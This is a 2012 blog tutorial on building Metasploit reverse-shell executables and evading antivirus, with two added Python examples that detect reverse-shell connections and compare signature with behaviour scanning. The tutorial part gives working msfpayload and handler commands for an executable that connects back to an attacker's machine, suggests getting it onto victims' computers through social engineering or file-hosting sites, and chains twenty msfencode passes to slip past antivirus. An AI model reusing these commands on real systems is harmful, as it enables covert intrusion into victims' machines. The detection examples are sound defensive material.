Friday 29 June 2012

BYPASS ANTIVIRUS IN METASPLOIT

 HI IM SEEKER

TODAY I WILL EXPLAIN HOW TO CREATE STANDALONE BINARIES IN METASPLOIT AND HOW TO AVOID DETECTION BY ANTIVIRUS.

Before we perform an antivirus evasion, let’s look at how to create standalone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell.
CREATING METASPLOIT BINARIES:-

1 seeker@bt# msfpayload windows/shell_reverse_tcp O

/// The O option lists all the options required for the chosen payload ///

2 seeker@bt# msfpayload windows/shell_reverse_tcp LHOST=192.168.57.78 LPORT=31337 X > /var/www/file.exe

/// This command creates the working executable, which you then need to get onto the victim's machine: through social engineering, by binding it with some other executable, by uploading it to 4shared.com and getting the victim to download it, and many other ways. ///

Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections.

3 msf > use exploit/multi/handler

4 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

5 msf exploit(handler) > show options

6 msf exploit(handler) > set LHOST 192.168.57.78

7 msf exploit(handler) > set LPORT 31337

8 msf exploit(handler) > exploit

/// The payload set on the handler must match the payload built into the executable: the file.exe from step 2 was built with windows/shell_reverse_tcp, so the handler has to be set to that payload for it (and it gives a plain command shell, not meterpreter); windows/meterpreter/reverse_tcp is the right setting for the meterpreter executable built in the encoding section below. ///

/// Now, after starting the listener, when the victim runs the executable on his system you will get a meterpreter shell on the victim's machine. ///
/// But the major problem here is antivirus, which will detect your executable as a virus and stop it from executing, so now we need to use encoders to make our exe undetectable. ///
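What the connect-back from step 8 looks like from the defender's side, as an added example that is not part of the original tutorial: a small detector run over constructed Sysmon-style network-connection events. The event shape, the port allowlist, the user-writable path fragments and every log line are assumptions made for the demonstration, not a real product's format or real logs. The outlook.exe line is there on purpose: a port allowlist that has not been baselined for the environment produces exactly that kind of false positive.

```python
import json

# Constructed Sysmon-style "network connection" events, one JSON object per line.
# They are made up for this example and are not real logs.
SAMPLE_EVENTS = r"""
{"ts": "2012-06-29T10:00:01", "image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "dst_ip": "203.0.113.10", "dst_port": 443, "initiated": true}
{"ts": "2012-06-29T10:00:05", "image": "C:\\Users\\bob\\Downloads\\file.exe", "dst_ip": "192.168.57.78", "dst_port": 31337, "initiated": true}
{"ts": "2012-06-29T10:00:09", "image": "C:\\Windows\\System32\\svchost.exe", "dst_ip": "192.168.57.1", "dst_port": 53, "initiated": true}
{"ts": "2012-06-29T10:00:12", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe", "dst_ip": "10.0.0.5", "dst_port": 4444, "initiated": true}
{"ts": "2012-06-29T10:00:20", "image": "C:\\Program Files\\Microsoft Office\\outlook.exe", "dst_ip": "10.0.0.9", "dst_port": 993, "initiated": true}
{"ts": "2012-06-29T10:00:25", "image": "C:\\Windows\\System32\\svchost.exe", "dst_ip": "10.0.0.7", "dst_port": 49152, "initiated": false}
""".strip().splitlines()

# Ports that legitimate client traffic on this (constructed) network is expected to use.
# A real deployment derives this allowlist from its own baseline; 993 (IMAPS) is left
# out here deliberately to show what an incomplete baseline does.
EXPECTED_PORTS = {53, 80, 443, 445, 3389}

# Path fragments that mean the connecting binary lives somewhere an ordinary user can
# write, i.e. where a downloaded file.exe would typically land.
USER_WRITABLE_FRAGMENTS = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\")


def is_user_writable_path(image: str) -> bool:
    """True when the process image sits under a user-writable directory."""
    low = image.lower()
    return any(frag in low for frag in USER_WRITABLE_FRAGMENTS)


def score_event(event: dict) -> list:
    """Return the reasons an outbound connection looks like a reverse shell; an empty
    list means nothing suspicious under these two rules."""
    reasons = []
    if not event.get("initiated", False):
        return reasons  # inbound connections are out of scope for this rule
    if event["dst_port"] not in EXPECTED_PORTS:
        reasons.append(f"outbound to unexpected port {event['dst_port']}")
    if is_user_writable_path(event["image"]):
        reasons.append("connecting binary runs from a user-writable path")
    return reasons


def detect_reverse_shell_candidates(lines) -> list:
    """Parse JSON-per-line events and return one alert per event that scored."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        reasons = score_event(event)
        if reasons:
            alerts.append({
                "ts": event["ts"],
                "image": event["image"],
                "dst": f"{event['dst_ip']}:{event['dst_port']}",
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_reverse_shell_candidates(SAMPLE_EVENTS):
        print(alert["ts"], alert["image"], "->", alert["dst"], "|", "; ".join(alert["reasons"]))
```

The file.exe event scores on both rules, which is the combination worth paging someone about; the outlook.exe event scores on the port rule alone and is the reminder that a port allowlist needs to be built from the environment's real traffic before the rule is trusted.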
EVADING ANTIVIRUS DETECTION:-

Antivirus is always a big issue for beginners and sometimes for professional hackers too, but today I will teach you how to evade antivirus using encoders. First, though, we need to understand how antivirus works.

How Antivirus Works?

Anti-virus software typically uses two different techniques to identify malicious code:
  • Examining files to look for known viruses by means of a virus dictionary
  • Identifying suspicious behavior from any computer program which might indicate infection
Most commercial anti-virus software uses both of these approaches, with an emphasis on the virus dictionary approach.

Virus dictionary approach
 
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.

To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.

Suspicious behavior approach
 
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.

Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries.

/// OK, now that we know how antivirus works, we will encode our exe to change its signature, so that when the antivirus scans our file it does not find any signature in its dictionary that matches the file, and we bypass the antivirus. Note that this only addresses the dictionary approach; the suspicious behavior approach described above does not look at the file's bytes at all. ///

ENCODING THE EXE:-

One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode alters the code in an executable so that it looks different to antivirus software but still runs the same way. Msfencode encodes the original executable in a new binary; then, when the executable is run, the decoder stub that msfencode prepended decodes the original code into memory and executes it.

1 seeker@bt# msfencode -h

/// Shows the msfencode usage options ///

2 seeker@bt# msfencode -l

/// Lists the available encoders ///

3 seeker@bt# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/file.exe

/// Here we have used five counts of shikata_ga_nai, feeding the code in raw format into five counts of alpha_upper encoding, which is then fed to another five counts of shikata_ga_nai, followed by five counts of countdown encoding, before finally directing the output into the desired executable. We are using a total of 20 encoding loops in an attempt to circumvent the antivirus software. ///

/// Now you can check whether your executable is detected by antivirus or not. If it is still detected, encode it again in the same way, using more encoders in raw format and increasing the count. ///
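The two detection approaches described under "How Antivirus Works", and why the encoding chain above only gets past one of them, as an added example that is not part of the original tutorial. The signatures, file samples and process events are all constructed for the demonstration; rotate_bytes is a toy transform used only to build a sample whose body no longer contains the dictionary bytes, and is not the msfencode algorithm. The constant TEMPLATE_MARKER stands in for anything the packaging step leaves byte-for-byte identical in every output, such as the default executable template msfencode wrapped payloads in, which vendors signatured on its own regardless of how many encoder passes were stacked in front of it.

```python
# Constructed pieces of a sample file. TEMPLATE_MARKER stands in for bytes the packaging
# tool emits unchanged in every output; BODY stands in for the payload code itself.
TEMPLATE_MARKER = b"DEMO-TEMPLATE-v1"
BODY = b"connect-back-to-192.168.57.78"

# Constructed "virus dictionary", written from the first captured sample the way a
# vendor would: one entry on the payload body, one on the unchanging template bytes.
# These are made-up patterns, not real antivirus signatures.
SIGNATURES = {
    "demo-reverse-shell-body": BODY,
    "demo-template-marker": TEMPLATE_MARKER,
}


def dictionary_scan(data: bytes) -> list:
    """Virus-dictionary approach: return every signature whose bytes occur in the file."""
    return [name for name, pattern in SIGNATURES.items() if pattern in data]


def behaviour_flags(events) -> list:
    """Suspicious-behaviour approach: judge what a process does, not what it contains.

    Each event is (process image, operation, target). Two rules: a process writing into
    another executable (the page's own example of suspicious behaviour), and a binary in
    a user-writable directory opening an outbound connection.
    """
    flags = []
    for process, op, target in events:
        if (op == "write"
                and target.lower().endswith((".exe", ".dll"))
                and target.lower() != process.lower()):
            flags.append(f"{process} wrote into executable {target}")
        if op == "connect" and "\\users\\" in process.lower():
            flags.append(f"{process} from a user-writable path connected to {target}")
    return flags


def rotate_bytes(data: bytes, key: int) -> bytes:
    """Toy transform (add a constant to every byte) used only to build a test sample whose
    body no longer contains the dictionary bytes. Not the msfencode algorithm."""
    return bytes((b + key) & 0xFF for b in data)


# Three constructed files: the raw payload, the same payload with its body transformed
# but the template untouched, and the transformed body behind a custom template.
RAW_SAMPLE = b"MZ" + TEMPLATE_MARKER + BODY
ENCODED_SAMPLE = b"MZ" + TEMPLATE_MARKER + rotate_bytes(BODY, 7)
CUSTOM_TEMPLATE_SAMPLE = b"MZ" + b"CUSTOM-STUB-0001" + rotate_bytes(BODY, 7)

# Constructed process events; they are the same whichever of the three files is run.
SAMPLE_EVENTS = [
    ("C:\\Users\\bob\\Downloads\\file.exe", "connect", "192.168.57.78:31337"),
    ("C:\\Windows\\System32\\svchost.exe", "connect", "192.168.57.1:53"),
    ("C:\\Users\\bob\\Downloads\\file.exe", "write", "C:\\Program Files\\app\\app.exe"),
    ("C:\\Program Files\\app\\setup.exe", "write", "C:\\Program Files\\app\\readme.txt"),
]


def compare_approaches() -> dict:
    """Run both approaches: the dictionary result shrinks as more of the file changes,
    while the behaviour result never depended on the file's bytes in the first place."""
    return {
        "raw": dictionary_scan(RAW_SAMPLE),
        "encoded": dictionary_scan(ENCODED_SAMPLE),
        "custom_template": dictionary_scan(CUSTOM_TEMPLATE_SAMPLE),
        "behaviour": behaviour_flags(SAMPLE_EVENTS),
    }


if __name__ == "__main__":
    for label, result in compare_approaches().items():
        print(f"{label:16s} {result}")
```

The encoded sample still trips the template signature, which is why repeating the encoding with a higher count, as the note above suggests, did not help against scanners that had simply signatured the wrapper; and even the custom-template sample, which the dictionary misses completely, produces the same two behaviour flags, because writing into another executable and calling out from a Downloads folder are visible no matter what the file's bytes look like.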




Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant